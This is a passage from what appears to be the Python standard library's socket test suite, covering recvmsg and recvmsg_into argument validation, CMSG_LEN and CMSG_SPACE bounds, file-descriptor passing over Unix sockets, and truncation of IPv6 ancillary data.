seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
